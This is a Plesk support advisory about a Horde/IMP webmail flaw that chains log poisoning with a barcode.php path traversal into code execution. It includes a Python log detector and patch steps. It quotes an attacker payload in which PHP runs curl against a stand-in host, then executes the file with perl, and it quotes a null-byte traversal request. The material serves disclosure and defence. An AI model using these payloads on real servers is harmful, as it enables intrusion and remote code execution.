Article ID: 113374, created on Apr 11, 2013, last review on Aug 12, 2014

Applies to:
  • Plesk 9.3 for Linux/Unix
  • Plesk 9.2 for Linux/Unix
  • Plesk 9.0 for Linux/Unix
  • Plesk 8.6 for Linux/Unix
  • Plesk 9.3 for Windows
  • Plesk 9.2 for Windows
  • Plesk 9.0 for Windows
  • Plesk 8.6 for Windows


The Horde/IMP package (versions 3.1.7-3.3.2) shipped with Plesk 8.x and with 9.x versions before 9.5.4 has a vulnerability that allows an attacker to execute arbitrary code. The attacker submits a webmail login with a POST request to the /horde/imp/redirect.php file, supplying PHP code as the username. For example:
<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>

The failed login is written, username included, to the /var/log/psa-horde/psa-horde.log file, so the PHP code now sits in that log. A second vulnerability, a path traversal in the barcode.php file, then lets the attacker make Horde include the log file and execute the code it contains; the request that does this is the second entry in the log excerpt below.

Here is what the attacker's requests, as they appear in the web server access log, and the corresponding entry in the psa-horde.log file look like:

- - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20091102 Firefox/3.5.5"
- - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20091102 Firefox/3.5.5"

Jan 17 08:01:35 HORDE [error] [imp] FAILED LOGIN to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?> [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
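A log check for the two artefacts of this attack chain, added here as an example and not part of the original article: it flags barcode.php requests whose type parameter carries path traversal or a null byte, and FAILED LOGIN entries whose username contains a PHP open tag. The sample log lines are constructed after the entries quoted above.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines modelled on the entries quoted in the article; the
# IP fields and the second request's method are blank there as well.
ACCESS_LOG = """\
- - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
- - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0"
- - [17/Jan/2012:08:02:00 -0500] "GET /horde/util/barcode.php?type=code128&text=12345 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""
HORDE_LOG = """\
Jan 17 08:01:35 HORDE [error] [imp] FAILED LOGIN to localhost:143[imap/notls] as <?php echo "x"; ?> [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
Jan 17 08:05:10 HORDE [error] [imp] FAILED LOGIN to localhost:143[imap/notls] as alice [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
"""

BARCODE_RE = re.compile(r'/horde/util/barcode\.php\?([^" ]*)')
FAILED_LOGIN_RE = re.compile(r'FAILED LOGIN to \S+ as (.*?) \[on line')
PHP_TAG_RE = re.compile(r'<\?(php|=)?', re.IGNORECASE)

def suspicious_barcode_requests(access_log):
    """Return barcode.php request paths whose 'type' parameter leaves the barcode
    directory ('../') or carries a null byte (%00) that truncates the appended suffix.
    parse_qs percent-decodes, so encoded forms such as %2e%2e%2f are caught too."""
    hits = []
    for line in access_log.splitlines():
        m = BARCODE_RE.search(line)
        if not m:
            continue
        for value in parse_qs(m.group(1), keep_blank_values=True).get("type", []):
            if "../" in value or "\x00" in value:
                hits.append(m.group(0))
    return hits

def injected_login_names(horde_log):
    """Return usernames from FAILED LOGIN entries that contain a PHP open tag.
    One of these means code is already sitting in psa-horde.log."""
    return [m.group(1) for m in map(FAILED_LOGIN_RE.search, horde_log.splitlines())
            if m and PHP_TAG_RE.search(m.group(1))]

if __name__ == "__main__":
    for path in suspicious_barcode_requests(ACCESS_LOG):
        print("traversal via barcode.php:", path)
    for user in injected_login_names(HORDE_LOG):
        print("PHP code logged as username:", user)
```

A hit from the second function on a server that has not yet been patched should be treated as a sign that the include step may already have been attempted, so the access log is worth checking for the first.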


Download the appropriate patch for Horde 3.1.7-3.3.2 for the platform your server runs on, unzip it, and place the file in the corresponding folder:

Linux/Unix: /usr/share/psa-horde/lib/Horde/  - [ patch ]

Windows: %plesk_vhosts%\webmail\horde\lib\Horde\ - [ patch ]


